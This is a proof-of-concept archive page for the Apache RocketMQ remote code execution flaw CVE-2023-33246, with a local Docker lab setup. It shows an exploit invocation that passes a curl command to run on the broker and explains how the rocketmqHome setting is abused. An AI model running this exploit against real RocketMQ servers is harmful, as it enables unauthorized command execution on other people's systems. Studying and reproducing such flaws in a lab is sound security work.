Associated Vulnerability
Title:Apache RocketMQ: Possible remote code execution vulnerability when using the update configuration function (CVE-2023-33246)Description:For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .
Readme
# CVE-2023-33246: Apache RocketMQ Remote Code Execution
## OVERVIEW
Apache RocketMQ is one of the most popular and widely used distributed messaging and streaming platforms.
A command execution vulnerability has been recently reported in Apache RocketMQ affecting version 5.1.0 and below. A remote unauthenticated user can exploit this vulnerability by using the update configuration function to execute commands with same access level as that of RocketMQ user process.
## Essential Components
### Nameserver:
1. The nameserver in RocketMQ acts as a registry or metadata store for the entire messaging infrastructure.
2. It maintains information about topics, queues, and the brokers responsible for handling messages.
3. Clients (producers and consumers) use the nameserver to discover the brokers that they need to communicate with for publishing or consuming messages.
4. The nameserver is responsible for dynamic routing, load balancing, and failover within the RocketMQ cluster.
5. It listens on a specific port (usually port 9876 by default) for incoming requests from clients and brokers.
### Broker:
1. Brokers are the workhorses of the RocketMQ system, responsible for storing and managing messages.
2. Each broker manages one or more topics, which are logical channels for message communication.
3. Producers publish messages to specific topics, and consumers subscribe to topics to receive messages.
4. Brokers handle message storage, replication, and delivery to consumers based on subscriptions and message consumption patterns.
5. They maintain message queues for each topic-partition, ensuring efficient message processing and delivery.
6. Brokers communicate with nameservers to register themselves, update metadata, and participate in the cluster's routing and load balancing mechanisms.
## Environment Setup:-
Setup local RocketMQ environment via Docker
```
docker pull apache/rocketmq:4.9.4
### Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
### Start Broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```
## usage examples
### 1. Version Check
### Using default config, Broker cluster gets initiated on tcp port 9876 to start receiving messages from a client. For example, below is a sample communication b/w a client and broker to fetch RocketMQ version
```
python3 check.py --ip 127.0.0.1 --port 9876
```
**PCAP**
### 2. Exploit analysis
The UpdateBrokerConfig() function is triggered when a request with code '25', which is associated with RequestCode, is received
```
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl 127.0.0.1/exp
```
PCAP
We utilize the "rocketmqHome" server configuration found in the broker.conf file. This configuration sets the value of the environmental variable ROCKETMQ_HOME within the RocketMQ user process. Through careful crafting of this value, we can execute commands of our choosing.
this is how this vulnerability works..
File Snapshot
[4.0K] /data/pocs/22bddbc7817e22d721f7d73a0e7a245657a021b2
├── [ 16K] check.py
├── [1.3K] CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py
└── [3.7K] README.md
0 directories, 3 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →